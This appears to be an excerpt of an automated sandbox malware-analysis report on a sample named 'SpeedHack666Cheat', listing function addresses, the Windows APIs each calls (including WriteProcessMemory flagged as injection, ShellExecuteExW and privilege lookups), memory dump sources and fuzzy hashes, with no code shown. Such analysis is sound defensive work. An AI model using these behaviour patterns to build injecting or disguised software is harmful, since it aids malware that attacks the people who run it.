Instruction Fuzzy Hash: 7111BF76504600AFEB21CF51DD45FAAFBE8EF44724F08C85AEA498B251D375A504CBB2

Function 0097A63B Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0097A6A8

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1fb03f39430e9f6a60126a785ccb4f17131a7a90ded854dc9c1a9ab4edfa772c
Instruction ID: 89c4b132dc78779cf57a871f5055a7a7eb210029fa09e9c3c4b8a84758fd3a2b
Opcode Fuzzy Hash: 1fb03f39430e9f6a60126a785ccb4f17131a7a90ded854dc9c1a9ab4edfa772c
Instruction Fuzzy Hash: 1B11D0764097C05FDB128B21DC45692BFB4EF47324F0984DBDC888F163D225A909CB62

Function 0097AE0E Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 0097AE56

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 6d61205086d2899c944dcdf01dec41e2c1f2d3f852184bd19f9fe434d7f2fcf5
Instruction ID: 006f5a29982f317f25ea2cdea97481edb4315fa933772073f8349099b55db8c6
Opcode Fuzzy Hash: 6d61205086d2899c944dcdf01dec41e2c1f2d3f852184bd19f9fe434d7f2fcf5
Instruction Fuzzy Hash: FC11A5726042408FEB50CF15DC4575AFBD8EF44720F08C46AED49CB251D335E804CA62

Function 0097AF6A Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0097AFB2

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6d61205086d2899c944dcdf01dec41e2c1f2d3f852184bd19f9fe434d7f2fcf5
Instruction ID: 6c595359eb21f268264c2090bf23ddb0fe02abf5843ed679c82c4dea96bb55a9
Opcode Fuzzy Hash: 6d61205086d2899c944dcdf01dec41e2c1f2d3f852184bd19f9fe434d7f2fcf5
Instruction Fuzzy Hash: 101188B26042408FEB10CF19DC45B5AFBD8EF54720F08C46AED49CB751E775E814CA62

Function 0097AC8C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0097ACE0

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 16231a7a97e811c83716092fe4dbad92abcd4f8d87c9fef85c6b0996f35fc751
Instruction ID: b7c843f8adec4e7435b494fea048c6c803f21abf524521b9da1da1b49ecd0ef6
Opcode Fuzzy Hash: 16231a7a97e811c83716092fe4dbad92abcd4f8d87c9fef85c6b0996f35fc751
Instruction Fuzzy Hash: 3011A5765093809FDB128F15DC45B56FFB4DF56220F08C0DBED898B6A3D275A908CB62

Function 0097A8E2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,458F42CF,00000000,00000000,00000000,00000000), ref: 0097A935

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 322af3e39b5cd6dc79351e56b06df9acea8607f260768b7cb9ffe1c67f577f61
Instruction ID: 1fa65d74f25f848189b1947a00b9ab5ba6194315e0e04d4a6e6717846dae1d28
Opcode Fuzzy Hash: 322af3e39b5cd6dc79351e56b06df9acea8607f260768b7cb9ffe1c67f577f61
Instruction Fuzzy Hash: 1301C47A504204AEE711CB05DC45BAAB7DCDF84724F15C49AEE489B291D378A9148AA3

Function 0097B8AA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0097B8E4

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: abc021175e47a1062aeff2a701482cd1b47938a89f21f22041a3744d2ef8d916
Instruction ID: 880b962e962004c21c39de71f3ecc4c642cfb9a1be1c66a8e16aa2a9a76c5898
Opcode Fuzzy Hash: abc021175e47a1062aeff2a701482cd1b47938a89f21f22041a3744d2ef8d916
Instruction Fuzzy Hash: E60192726042448FEB10CF65D9857A6FBD8EF04324F08C4ABDE09CB251D375E804CB62

Function 0097A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0097A1C2

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: a004743847435fd9fa1caebad21df828ee78faa8317ecc3800a0e6bcac202dab
Instruction ID: 79d82189e10db61b9220acee1f69956442eff948323508135abc63cb2c1fee72
Opcode Fuzzy Hash: a004743847435fd9fa1caebad21df828ee78faa8317ecc3800a0e6bcac202dab
Instruction Fuzzy Hash: ED017171500200ABD310DF16DC45B76FBE8EB88A20F14856AED089B751E735B915CBE6

Function 0097A5C2 Relevance: 1.5, APIs: 1, Instructions: 43injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0097A608

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f6c95e69695eb69bd1d04f4f584a2a54dad2f2ea09ff380fa1db8055eb5459bb
Instruction ID: 2960b9e5b53d69ae61238aa6746bcd664fb1aee206cd7fc9fab9c1155949e0bc
Opcode Fuzzy Hash: f6c95e69695eb69bd1d04f4f584a2a54dad2f2ea09ff380fa1db8055eb5459bb
Instruction Fuzzy Hash: F40180765002409FEB21CF15D885B6AFBE4EF54720F0CC49AEE494B261D375E858DE62

Function 0097ACAE Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 0097ACE0

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 14e08aaf7040f8a4227f79432f4c22733a1942306093a652801e7a10fa39ec54
Instruction ID: 6eb30e8504822a54f2da90fdf5a14afdd63923c5384bf516a3421d3ced0e6c0c
Opcode Fuzzy Hash: 14e08aaf7040f8a4227f79432f4c22733a1942306093a652801e7a10fa39ec54
Instruction Fuzzy Hash: 3E01F4365042409FEB218F15D98576AFBE4EF84724F0CC0AADD498B792D379E804CEA3

Function 0097AD72 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNELBASE ref: 0097ADA1

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
Opcode ID: bcb8ab35c9407273a0c7b6b6199ac3747ef012a640e5acc5ff358372d0e3de35
Instruction ID: 0d54088d77cbf5440e966948e0d9bc82cf68b644e2fbfe213941aa193687d396
Opcode Fuzzy Hash: bcb8ab35c9407273a0c7b6b6199ac3747ef012a640e5acc5ff358372d0e3de35
Instruction Fuzzy Hash: 6001F9314042408FDB20CF15D985799FBD4EF44325F08C8ABDD098F692D379A804CBA3

Function 0097A676 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0097A6A8

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: bbc7af522653c8da51c2d1cd49e9250095f0cd749b768c8fe94d4a24db0fc527
Instruction ID: d5bf5c949e273a81e0cf5be4330cba96658842d692ee60bd9aebc87339afa021
Opcode Fuzzy Hash: bbc7af522653c8da51c2d1cd49e9250095f0cd749b768c8fe94d4a24db0fc527
Instruction Fuzzy Hash: ADF0C2364046408FEB11CF16D985765FBE4EF84724F1CC49ADE094B362D37AA814CEA3

Function 04A507C7 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

2, xrefs: 04A507FD

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: dc85831b9c3444ae3d71696878f9f47ec5c22fa5085994fc28faea2d34ed8df1
Instruction ID: 69223e8c2494a1bf3929c0dbe722cefd8b2df9dff87d3ca95906cdec8ae34c09
Opcode Fuzzy Hash: dc85831b9c3444ae3d71696878f9f47ec5c22fa5085994fc28faea2d34ed8df1
Instruction Fuzzy Hash: 4651D4F3C9AA8A4FDB01AF6598C74C9BF70DE22354F048486C4516F14BF62606178F96

Function 0097B180 Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0097B1EC

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c72ca16b496d74c439f91fd1ccf03c2fa3548df0df5c23fc0781ca9f751ed78c
Instruction ID: 521f850132e470e22bf8b24ff971ef779a67cbfc74be89dec1d20fd99f19b3c2
Opcode Fuzzy Hash: c72ca16b496d74c439f91fd1ccf03c2fa3548df0df5c23fc0781ca9f751ed78c
Instruction Fuzzy Hash: 9C21D1725093C05FDB028B25DC54792BFB4AF57324F0980DBEC848F663D224A908CB61

Function 0097A3C0 Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0097A414

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 75c130f59f79e145252dc482cba03593962a2b401e5b9e1b92eb727744e3d40c
Instruction ID: 210cfdd198fd202332b18f8dab66ed5ed722497cfa638f18d21538a5b1cd4f0c
Opcode Fuzzy Hash: 75c130f59f79e145252dc482cba03593962a2b401e5b9e1b92eb727744e3d40c
Instruction Fuzzy Hash: AF1194715093809FDB128B15DC94756BFA8DF46220F0884DBED498F6A2D275A818CB62

Function 0097B1BA Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0097B1EC

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 00978b1f6256e0c82c0073d95d80a499e648287579b39b176c7c51cfeea44d25
Instruction ID: 50bab83f49caa1d61b8133240af5aac794f2d0899954eafb7bf01f1e97c324ff
Opcode Fuzzy Hash: 00978b1f6256e0c82c0073d95d80a499e648287579b39b176c7c51cfeea44d25
Instruction Fuzzy Hash: CE01D4765052408FDB10CF15E9857AAFBE4DF54724F08C4ABDD09CF652D375A814CBA2

Function 0097A3E2 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0097A414

Memory Dump Source

Source File: 00000000.00000002.1490794243.000000000097A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97a000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 860750fbd9ed7214f44f18f064c3c22eee7b802233f60e27babb44b50e83be14
Instruction ID: e62d462980870085cec24cf264c2208e41f4237bda4d89c9edf9940a433d3a11
Opcode Fuzzy Hash: 860750fbd9ed7214f44f18f064c3c22eee7b802233f60e27babb44b50e83be14
Instruction Fuzzy Hash: F10184765042409FEB10CF15D98976AFBD4DF84724F08C4ABDD098F662D37AA814CAA2

Function 00B510DE Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

|, xrefs: 00B5392A

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: cedc36de1ad24fe1f9a9449f901cafe9146a030895838e92958cf7fca9fcf6ff
Instruction ID: 238b2f1e77e0e5cdeffcb13fe213b866bf2a972f5c82e85219fb7565887064e5
Opcode Fuzzy Hash: cedc36de1ad24fe1f9a9449f901cafe9146a030895838e92958cf7fca9fcf6ff
Instruction Fuzzy Hash: 6BF0C871A1D294CBE7104F64C8543BC37E0AB0A756F1841E6CC0ADB381D7758D09DBA6

Function 00B50372 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

9, xrefs: 00B556AC

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 16937a182ca8760de446921121043e985b269f42c50908c149e4e589f7304b56
Instruction ID: 90b5d5ae1e58855ac87cbd7b9192f46eb19cbff23e17d438da023d862746e952
Opcode Fuzzy Hash: 16937a182ca8760de446921121043e985b269f42c50908c149e4e589f7304b56
Instruction Fuzzy Hash: 0AE0C2B2A096E5CFF7615F28887534C3BD0AB09366F2880DBDC059B282CB750E059F5A

Function 04A50295 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 04A502C3

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7bec09702a1256311e3ea57c348f2459bb39aa33c9d977bc2f80771c1dddb0e3
Instruction ID: b3666a0e6eaad94eff1327db7a21b05195f696b6ec71a371dd561c0060302373
Opcode Fuzzy Hash: 7bec09702a1256311e3ea57c348f2459bb39aa33c9d977bc2f80771c1dddb0e3
Instruction Fuzzy Hash: 51E04670E0A2488BDB04EFA5D60439DB7F2BF55300F5088A9D906DB264EB7849088F02

Function 04A5010A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

K, xrefs: 04A50136

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: e78c34369441b61092be3a9ebb575c85353ee776634adc2ad1f23b7fa7f1ff9b
Instruction ID: 34adda83a0cdd9aead1c7793871df078c2b66d1a1bd640c60cb666e315559311
Opcode Fuzzy Hash: e78c34369441b61092be3a9ebb575c85353ee776634adc2ad1f23b7fa7f1ff9b
Instruction Fuzzy Hash: 10E08674E0A2058FDB04EFB0D60425E77F2BF50301F5084A5E906DB365DB388D049F02

Function 04A509AE Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

V, xrefs: 04A509C6

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 3583573d2f4436ce116624ce95ad407756e03b369aede99076389ed3c092b217
Instruction ID: 6c5a2f0f4d5b5e9a709b41a84cd0e0c114f77bfd27035ef82ab96bf1b9e01914
Opcode Fuzzy Hash: 3583573d2f4436ce116624ce95ad407756e03b369aede99076389ed3c092b217
Instruction Fuzzy Hash: 3CE04638A0A2058BDF40AFA0EA1839E77B1BB21301F9044A5E902DB361DA384A489F13

Function 04A50639 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

/, xrefs: 04A5065E

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 0c2f68918d3fd174aff53a7e48e9e54bca203ab4250b23efc5305b3ce81e676f
Instruction ID: bcde6ae1988c35c0921864e5d327527eaf782673f2d948a9bfd8ac4836468506
Opcode Fuzzy Hash: 0c2f68918d3fd174aff53a7e48e9e54bca203ab4250b23efc5305b3ce81e676f
Instruction Fuzzy Hash: A3D0A73090F2464FCB01DB70851A3987FF0AF07310F9045D68592CB2B3EE38481D9B01

Function 04A5037E Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

d, xrefs: 04A503A3

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c7500d9bc06dc432bd623dc723e0a4b6403007578b81c4031b8256ae61ec6d27
Instruction ID: ef70c484c343ba49f55bc36470ff9f9f2858c983a2cd7c6f838f801e6db84ff6
Opcode Fuzzy Hash: c7500d9bc06dc432bd623dc723e0a4b6403007578b81c4031b8256ae61ec6d27
Instruction Fuzzy Hash: 85D0A730A053418BD7415B70992538C3BF19F01340FC0809AC586DB3A2DE38080D5B51

Function 04A50222 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

(, xrefs: 04A50237

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: c45d1b1e1417f5bc908b625824e3ca5bf6c44c7e23661ed57eebd7026fd9388a
Instruction ID: 18ce68aa01f2ae4b55579bde14e23b282a5187f0ec9efd00ebea60c3f4a4a141
Opcode Fuzzy Hash: c45d1b1e1417f5bc908b625824e3ca5bf6c44c7e23661ed57eebd7026fd9388a
Instruction Fuzzy Hash: F3D0C934A0B308CBDF84EFA4D2582AD77F6FB15301FA04869D502DB3A5DA385E489B02

Function 04A503AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 04A503C4

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: b69fffaab9a5843604b4489cf692b9df8e371b1eee79a06caa73623f67ba15b3
Instruction ID: 3de6117e59a3bb588e9934a5bad4bba3b6b3e343b42de46e2af761325496c301
Opcode Fuzzy Hash: b69fffaab9a5843604b4489cf692b9df8e371b1eee79a06caa73623f67ba15b3
Instruction Fuzzy Hash: 67C04C70B062048BDF94AFB095183AD76F5AF55301F90456D9502973A6DF3808089F11

Function 04A508B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 04A508D0

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: e76e6a8dad52c248aae288cafc81e9797fd049ec9976f0556af9daf5e154745e
Instruction ID: eb91a96c865c2d08e3f34fa016191f0ef0eedaa6ef042607d16baee0658b93ab
Opcode Fuzzy Hash: e76e6a8dad52c248aae288cafc81e9797fd049ec9976f0556af9daf5e154745e
Instruction Fuzzy Hash: 18C04C70A061048BDB94AFB0991879D76F1AB54301F8084A99546D73A5DE7809449F21

Function 04A504C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 04A504DE

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 85decbc901fa6052fcd01b89a45d4ad510e0544b1dc4d8504ae7eb964cb8d01e
Instruction ID: 1014ec4309bad96a12a91a7636ae7a37b51fe33a706d259752bbcf22fae3762d
Opcode Fuzzy Hash: 85decbc901fa6052fcd01b89a45d4ad510e0544b1dc4d8504ae7eb964cb8d01e
Instruction Fuzzy Hash: 56C04C70A062048BDB44AFB0951879D76F5AB54341F8084699906EB3A5DA381508DF11

Function 04A508DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 04A508F4

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: af1bee8cbb13e583978bc10f2521b60a8cf8e77466d78791f6ca13e827a37f42
Instruction ID: 29f6c51f55886c4be11ed7f4e28e1eaa1a8dc624d18494567b2869bf8e8b3a1d
Opcode Fuzzy Hash: af1bee8cbb13e583978bc10f2521b60a8cf8e77466d78791f6ca13e827a37f42
Instruction Fuzzy Hash: 86C04C70A471048BEB94AFB0961979C76F5AB54301F9044AD9A0A973A6DA380A049F11

Function 04A50436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 04A5044E

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 38ee554cd28a81bd88b1827eece906d4cedc9e87191354326c81381d5d53e245
Instruction ID: e2b3b58d300fc5a0aaf2a317960732ae6d7b3ad1b4a0a6f8b738393345bdec8b
Opcode Fuzzy Hash: 38ee554cd28a81bd88b1827eece906d4cedc9e87191354326c81381d5d53e245
Instruction Fuzzy Hash: 1EC04C70F162048BEB54AFB0952979D76F5AB54301F8044AD9506AB3A6DA3809045F11

Function 04A50500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 04A50515

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 869f91f1d8bedeabaab4dcb4b2550ab3976aea0f5ca22d75555d267862425e04
Instruction ID: c3ee4ad37b958028539815eb518bdca0bd05a074c29d228262e09622cc853f99
Opcode Fuzzy Hash: 869f91f1d8bedeabaab4dcb4b2550ab3976aea0f5ca22d75555d267862425e04
Instruction Fuzzy Hash: F1C04C70A071048BDB54AFB0921839D76F5AB54345F90446D9902973A5DA391A04DF11

Function 04A50415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 04A5042A

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 9319fe864d468808747b3ebfff0b9bc24c4b4042db0ddace99a878b2d21a6dc9
Instruction ID: fc4760ecc45d5132392788d76d424ee9645d917c5d8d72067b2f1e3625b608e7
Opcode Fuzzy Hash: 9319fe864d468808747b3ebfff0b9bc24c4b4042db0ddace99a878b2d21a6dc9
Instruction Fuzzy Hash: ADC04C74E06244CBEB64AFB0952879D76F1AB54301F90846D9912973A6DA3804085F11

Function 04A50340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 04A50358

Memory Dump Source

Source File: 00000000.00000002.1536509080.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: e1a5866929994817de5fe5f660220adac135d60ea91b382521b7531bb0bf524e
Instruction ID: 23f77f6cc2c7fe22683202d361eeac67b7237e170a0a96e20f66b492ea6b7a39
Opcode Fuzzy Hash: e1a5866929994817de5fe5f660220adac135d60ea91b382521b7531bb0bf524e
Instruction Fuzzy Hash: D1C08C30A071008BCB90AFB0811939C36F0AB01301F8080A8840A973A1DE3809088F01

Function 00B5F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1504312794.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_SpeedHack666Cheat (no VM detected).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777413719e2d007e59745ca02f452a7009123b2c4ba89641fe23ec4a191e44bb
Instruction ID: 3d158b789df154ca6050db6bfd41084c7baa33ce4fc48bbe2c0dfe3e1d6d8711
